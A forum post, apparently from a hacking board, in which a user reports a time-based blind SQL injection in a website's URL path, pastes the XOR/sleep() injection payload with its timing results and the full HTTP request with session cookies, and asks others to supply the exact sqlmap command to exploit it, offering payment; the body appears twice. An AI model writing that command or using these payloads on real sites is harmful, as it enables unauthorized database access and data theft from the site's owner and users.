When I was testing a website today, I found such SQL injection, which is the first time I encountered。
I have used many sqlmap commands, but all failed. Can anyone help me, write down the exact sqlmap command, it is much appreciated, maybe I can pay some thanks。
URL:https://www.example.com/
Parameter:/<s>/[*]/
Path Fragment input /<s>/[*]/ was set to 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z
Tests performed:
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.664
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.199
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.187
0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.194
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.216
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.189
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.198
Original value: s_ship
GET /shangjia/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.example.com/
Cookie: PHPSESSID=e249776d8f8aba2ef24df4f32a7af88d; qpZg_566b_fromPC=4089tZcrxBdEyoA0Iqhf%2BEV0UoExwn7sTdYb8FrCORlqF9LojmUGN2Sd3%2BU; qpZg_566b_tailshenqingip=93f3Orvwzva9kfBjADF8HWOeEJQS0KvZi63LBYT9ACPFgPZ%2BuZshn%2FVAXPY5og; Secure; qpZg_566b_authNum=7002gUiwmqexj84NPKU0758LSS4qvkS2Xj4DFsKWMyEGitvTGT5GNarlEWeoO1LWG3F6qj8V; qpZg_566b_authCode=335aHQcn9ifoQITXOWV1rAgIjiKTE2NkoWFPM8TiKVo%2FIQ; qpZg_566b_choosePC=e4beFciqxYVSssW7%2BPE%2B2rJcHu%2FDvQaHExw5zged0X8O5atarDQvWg; qpZg_566b_newsFromPC=8f87355RsIaDJOqgsY3z3B0QBII1C9i0oQy8xq11YAbiefEHfxoj%2FFYoT5V8VgfWgAk05N7CpaRcq2seIaSGN9xOzBnDJ2blgQfYZbkigbziGpK9oWhgy7VdKYRspaq7X4PfprjqcllhDYPYfgjlOt5QbPvrF%2FN6MPnZ9CYbrZJJVN76I8nX%2FeWKWbndSNXKQGOFrdn%2Bn2Gr%2BKsNN%2Bh%2BubSLtV%2F7Rv2cgGapxI5r3iFvQohWDvZulm81; predomain=cHJlfDI1Mnzlub%2Flt558aHR0cDovL2d6LmVkYWkuY29tL3xneg%3D%3D; changeCity=0; yipdomain=yip%7C22%7C%E9%87%8D%E5%BA%86%7Chttp%3A%2F%2Fcq.edai.com%7Ccq; qpZg_566b_evaluate_salary=7905QEAzSvThTuCYb%2Bv8nvdP2vPJfW9OtlJKt1gD4g; qpZg_566b_daikuan=9f79asEMr8yfGa4AhZnJkas%2BjiIdrrpXJ45rUY3bcxey3MINZQP8yywKu3kVVkBmOCSMfaEsEcv23PmFTgkYjfbN2CKk7JqecJkdOQtgouB40lOOaatVCHdI4csRd2HNiaxeRRRqqfXLfbXC65QSxRuYV0Wb9FsBQFdsDg7gUYJd0a6dFGNkOOwXCNJSlWVFUYNbBoAvACJgXFQ
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: www.example.com
Connection: Keep-alive
I have used many sqlmap commands, but all failed. Can anyone help me, write down the exact sqlmap command, it is much appreciated, maybe I can pay some thanks。
URL:https://www.example.com/
Parameter:/<s>/[*]/
Path Fragment input /<s>/[*]/ was set to 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z
Tests performed:
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.664
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.199
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.187
0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.194
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.216
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.189
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.198
Original value: s_ship
GET /shangjia/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.example.com/
Cookie: PHPSESSID=e249776d8f8aba2ef24df4f32a7af88d; qpZg_566b_fromPC=4089tZcrxBdEyoA0Iqhf%2BEV0UoExwn7sTdYb8FrCORlqF9LojmUGN2Sd3%2BU; qpZg_566b_tailshenqingip=93f3Orvwzva9kfBjADF8HWOeEJQS0KvZi63LBYT9ACPFgPZ%2BuZshn%2FVAXPY5og; Secure; qpZg_566b_authNum=7002gUiwmqexj84NPKU0758LSS4qvkS2Xj4DFsKWMyEGitvTGT5GNarlEWeoO1LWG3F6qj8V; qpZg_566b_authCode=335aHQcn9ifoQITXOWV1rAgIjiKTE2NkoWFPM8TiKVo%2FIQ; qpZg_566b_choosePC=e4beFciqxYVSssW7%2BPE%2B2rJcHu%2FDvQaHExw5zged0X8O5atarDQvWg; qpZg_566b_newsFromPC=8f87355RsIaDJOqgsY3z3B0QBII1C9i0oQy8xq11YAbiefEHfxoj%2FFYoT5V8VgfWgAk05N7CpaRcq2seIaSGN9xOzBnDJ2blgQfYZbkigbziGpK9oWhgy7VdKYRspaq7X4PfprjqcllhDYPYfgjlOt5QbPvrF%2FN6MPnZ9CYbrZJJVN76I8nX%2FeWKWbndSNXKQGOFrdn%2Bn2Gr%2BKsNN%2Bh%2BubSLtV%2F7Rv2cgGapxI5r3iFvQohWDvZulm81; predomain=cHJlfDI1Mnzlub%2Flt558aHR0cDovL2d6LmVkYWkuY29tL3xneg%3D%3D; changeCity=0; yipdomain=yip%7C22%7C%E9%87%8D%E5%BA%86%7Chttp%3A%2F%2Fcq.edai.com%7Ccq; qpZg_566b_evaluate_salary=7905QEAzSvThTuCYb%2Bv8nvdP2vPJfW9OtlJKt1gD4g; qpZg_566b_daikuan=9f79asEMr8yfGa4AhZnJkas%2BjiIdrrpXJ45rUY3bcxey3MINZQP8yywKu3kVVkBmOCSMfaEsEcv23PmFTgkYjfbN2CKk7JqecJkdOQtgouB40lOOaatVCHdI4csRd2HNiaxeRRRqqfXLfbXC65QSxRuYV0Wb9FsBQFdsDg7gUYJd0a6dFGNkOOwXCNJSlWVFUYNbBoAvACJgXFQ
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: www.example.com
Connection: Keep-alive
Последнее редактирование: